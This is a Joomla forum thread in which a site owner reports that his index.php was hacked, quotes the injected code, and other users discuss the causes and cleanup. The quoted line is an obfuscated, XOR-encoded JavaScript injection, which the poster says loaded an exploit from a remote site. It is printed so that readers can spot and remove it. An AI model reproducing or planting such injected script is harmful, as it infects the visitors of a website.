You may be vulnerable. I was hacked. Check your Index.php
-
-
- Drandon
- Jr. Rocketeer
- Posts: 21
- Thanks: 0
-
I was hacked a few days ago. The server my site is hosted has a couple of settings that aren't optimal for my Joomla! installation and so, long story short, my site got hacked. I would never have known it if I hadn't checked the site from a computer at another location using IE7. I got a pop-up warning from IE7 which clued me in.
I found the offending code in my index.php file in the root. It was calling a JS/Exploit from a site in Russia, which was then trying to install a malicious info gathering script.
What to look for. Open up your index.php file in the root directory and scroll to near the bottom of the file. Look for this code:
echo "\n<script language="JavaScript">e = '0x00' + '54';str1 = "%EF%B7%BC%A1%CB%A6%A7%AC%BF%B0%E8%F5%A1%BC%A6%BC%B5%BC%BF%BC%A7%AC%ED%B3%BC%B7%B7%B0%B9%F5%E9%EF%BC%B1%A5%B4%B8%B0%CB%A6%A5%B6%E8%F5%B3%A7%A7%BB%ED%FA%FA%B2%BC%A1%B0%B6%B9%A7%F9%BC%B9%B1%BA%FA%BF%B7%FA%B8%B0%B9%A7%FA%F5%CB%A2%BC%B7%A7%B3%E8%E4%CB%B3%B0%BC%B2%B3%A7%E8%E4%E9%EF%FA%BC%B1%A5%B4%B8%B0%E9%EF%FA%B7%BC%A1%E9";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>\n";
Then cut it out.
-
-
-
- Daniel Chapman
- Elite Rocketeer
- Posts: 1258
- Thanks: 0
- Thanks for this chief. Good to know.
-
www.ninjoomla.com
- The Ninjoomla Open Source Extension Club
Over 50 open source extensions and 100 videos to you build the site you want.
-
-
-
- Bob Ateah
- Elite Rocketeer
- Posts: 4521
- Thanks: 0
-
Thanks for the heads up and good luck with the site Drandon.
I am guessing that your webhost doesn't allow an httaccess file and has register globals on? - The member formerly known as Roland Deschain
After your question is solved, please Edit your original post and choose the Solved message icon, thank you!
-
-
-
- GollumX
- Elite Rocketeer
- Posts: 2817
- Thanks: 0
- did filist.php help?
- Say no to Internet Explorer 6.
twitter.com/mark_up
-
-
-
- Drandon
- Jr. Rocketeer
- Posts: 21
- Thanks: 0
-
"Thanks for the heads up and good luck with the site Drandon.
I am guessing that your webhost doesn't allow an httaccess file and has register globals on?"
You would be 100% correct. If anyone knows of a good host that meets all those requirements I would be most appreciative.
"did filist.php help?"
As a matter of fact it did. Initially I was only searching for files that didn't seem lik they belonged, but I couldn't find any on the list. Then I noticed that my site was calling information from a remote location via the status bar at the bottom of the brower. I checked the filst.php page and found that the index had been accessed recently which prompted me to check it. It was a great help, man and I appreciate it greatly so thank you, and God Bless!
-
-
-
- GollumX
- Elite Rocketeer
- Posts: 2817
- Thanks: 0
-
glad to have helped Drandon
If the file is still on your server please remove it. I think I neglected to mention this when posting the file. Once used delete it from your server. It could pose a security risk itself if left onsite. You can always upload it again every now and then to do a quick check. - Say no to Internet Explorer 6.
twitter.com/mark_up
-
Time to create page: 0.071 seconds